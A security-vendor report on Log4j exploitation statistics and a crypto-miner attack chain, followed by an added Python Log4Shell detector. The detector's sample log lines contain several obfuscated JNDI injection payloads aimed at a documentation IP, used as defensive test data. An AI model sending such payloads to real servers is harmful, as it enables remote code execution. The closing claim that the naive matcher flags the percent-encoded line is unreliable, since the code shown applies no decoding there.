CPR has detected numerous attacks exploiting the Log4j vulnerability and walks through a detailed example of how a real-life attack actually works. While most of the detected activity used the vulnerability for Linux-based crypto mining, Check Point researchers have now observed an attack involving a previously undetected, first-seen .NET-based malware. This specific attack, seen today, targeted five victims in the finance, banking and software industries in the following countries: Israel, the United States, South Korea, Switzerland and Cyprus. The server hosting the malicious files is located in the US and serves multiple malicious files.
Such attacks (crypto-oriented and less destructive) represent the early stages of larger-scale attacks such as ransomware. They act as a kind of "live trial" of the vulnerability and of the damage that can be done to victims, ahead of a larger offensive.
In simple terms, once any type of malware has been injected, it is only a question of time until a larger attack follows. Technically there is not much difference: what is crypto mining today often becomes ransomware and other significant attacks later.
Currently, CPR has tracked over 1,272,000 attempts to exploit the vulnerability, affecting over 44% of corporate networks globally.
How the Attack Works:
The attack exploits the Log4j vulnerability to download a Trojan, which in turn downloads an .exe file that installs a crypto-miner. Once the crypto-miner is installed, it consumes the victim's resources to mine cryptocurrency for the attackers' profit, without the victim knowing they have been compromised. As part of the malware's evasion techniques, all relevant function and file names are obfuscated to avoid detection by static analysis.
- So far, CPR has tracked over 1,272,000 attempts to exploit the vulnerability, 46% of them by known malicious hacking groups.
- Attempted exploits have been documented on over 44% of corporate networks globally.
Lotem Finkelstein, Head of Threat Intelligence at Check Point Software:
“We have detected a massive number of exploitation attempts during the last few days. Attackers are actively scanning for potentially vulnerable targets, and new scanning tools for this vulnerability keep surfacing. Lower scale attacks are how larger scale attacks develop. Threat actors like to test their tools and targets, leading to more dangerous attacks such as ransomware.
This is clearly one of the most serious vulnerabilities on the internet in recent years, and it’s spreading like wildfire. At some points, we saw over 100 hacks a minute related to the Log4j vulnerability. We’re seeing what appears to be an evolutionary repression, with new variations of the original exploit being introduced rapidly — over 60 in less than 24 hours. The number of combinations of how to exploit it gives the attacker many alternatives to bypass newly introduced protections. It means that one layer of protection is not enough, and only a multi-layered security posture would provide resilient protection.
Unlike other major cyber attacks that involve one or a limited number of software products, Log4j is basically embedded in every Java-based product or web service. It is very difficult to manually remediate it. Once an exploit was published (on Friday), scans of the internet ensued (to locate surfaces which are vulnerable due to this incident). Those who won’t implement a protection have probably already been scanned by malicious actors. Already, we’ve documented over 1,272,000 attacks, where over 44% of corporate networks globally have been targeted.
This vulnerability, because of the complexity in patching it and the ease of exploiting it, will stay with us for years to come, unless companies and services take immediate action to prevent the attacks on their products by implementing a protection. Now is the time to act. Given the holiday season, when security teams may be slower to implement protective measures, the threat is imminent. This acts like a cyber pandemic — highly contagious, spreads rapidly and has multiple variants, which force more ways to attack.”
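The attack chain above starts with a Log4j lookup string (CVE-2021-44228, `${jndi:ldap://...}`) landing in a logged field such as a User-Agent, and the quote notes that dozens of exploit variants appeared within a day to slip past freshly added pattern-matching protections. The example below, added here and not part of the original report or Check Point's own tooling, shows why a single-layer signature fails: it undoes the Log4j lookup tricks attackers used to disguise the `jndi:` keyword (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`, URL encoding) before matching, and compares that with a naive `${jndi:` regex over a handful of constructed access-log lines. The log lines and the 203.0.113.0/24 and 198.51.100.0/24 addresses are constructed test data, not observed attack infrastructure.

```python
"""Log4Shell (CVE-2021-44228) lookup detection with de-obfuscation of Log4j
lookup variants. Added example; the sample log lines are constructed."""
import re
from urllib.parse import unquote

# An innermost ${...} token: no nested "${" and no "}" inside the braces.
INNERMOST = re.compile(r"\$\{([^{}$]*)\}")
# The pattern a naive WAF/IDS signature would use.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost Log4j lookup the way Log4j 2.x would, but keep
    a jndi: lookup untouched so the caller can match on it."""
    body = match.group(1)
    lowered = body.lower().lstrip()
    if lowered.startswith("jndi:"):
        return match.group(0)
    # ${lower:X} / ${upper:X} case-mapping lookups.
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    # ${name:-default}: an undefined lookup (e.g. ${::-j}, ${env:NaN:-j})
    # collapses to the text after the first ":-".
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Unknown lookup: keep the text, drop the braces (prevents endless loops).
    return body


def normalize(text, max_passes=64):
    """Undo URL encoding and resolve nested lookups from the inside out until
    the string stops changing (bounded so hostile input cannot spin forever)."""
    for _ in range(3):  # peel a few layers of percent-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_passes):
        new_text = INNERMOST.sub(_resolve, text)
        if new_text == text:
            break
        text = new_text
    return text


def naive_match(text):
    """Single-layer signature: matches only the undisguised payload."""
    return JNDI.search(text) is not None


def is_log4shell(text):
    """Match after de-obfuscation: catches the disguised variants too."""
    return JNDI.search(normalize(text)) is not None


# Constructed sample access-log lines (TEST-NET addresses, not real hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:21:03:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:21:03:12 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:21:03:13 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}${lower:a}${lower:p}://203.0.113.10:1389/a}"',
    '198.51.100.10 - - [10/Dec/2021:21:03:14 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10:1389/a}"',
    '198.51.100.11 - - [10/Dec/2021:21:03:15 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//203.0.113.10:1389/a}"',
    '198.51.100.12 - - [10/Dec/2021:21:03:16 +0000] '
    '"GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]


def scan(lines):
    """Return (line_no, naive_hit, normalized_hit) for every line that either
    detector flags, so the gap between the two layers is visible."""
    results = []
    for number, line in enumerate(lines):
        naive, normalized = naive_match(line), is_log4shell(line)
        if naive or normalized:
            results.append((number, naive, normalized))
    return results


if __name__ == "__main__":
    for number, naive, normalized in scan(SAMPLE_LOG):
        print(f"line {number}: naive={naive} normalized={normalized}")
        print("   ->", normalize(SAMPLE_LOG[number])[-60:])
```

Running the block prints five hits; the naive signature only sees lines 1 and 5 (the second only because the decoder runs first), while the de-obfuscating detector flags all five and reduces each to the same `${jndi:ldap://203.0.113.10:1389/a}` string. In production this normalization belongs in front of the signature, and the signature itself should sit behind an egress block on outbound LDAP/RMI from application servers, since a matcher can only ever chase the variants it already knows about.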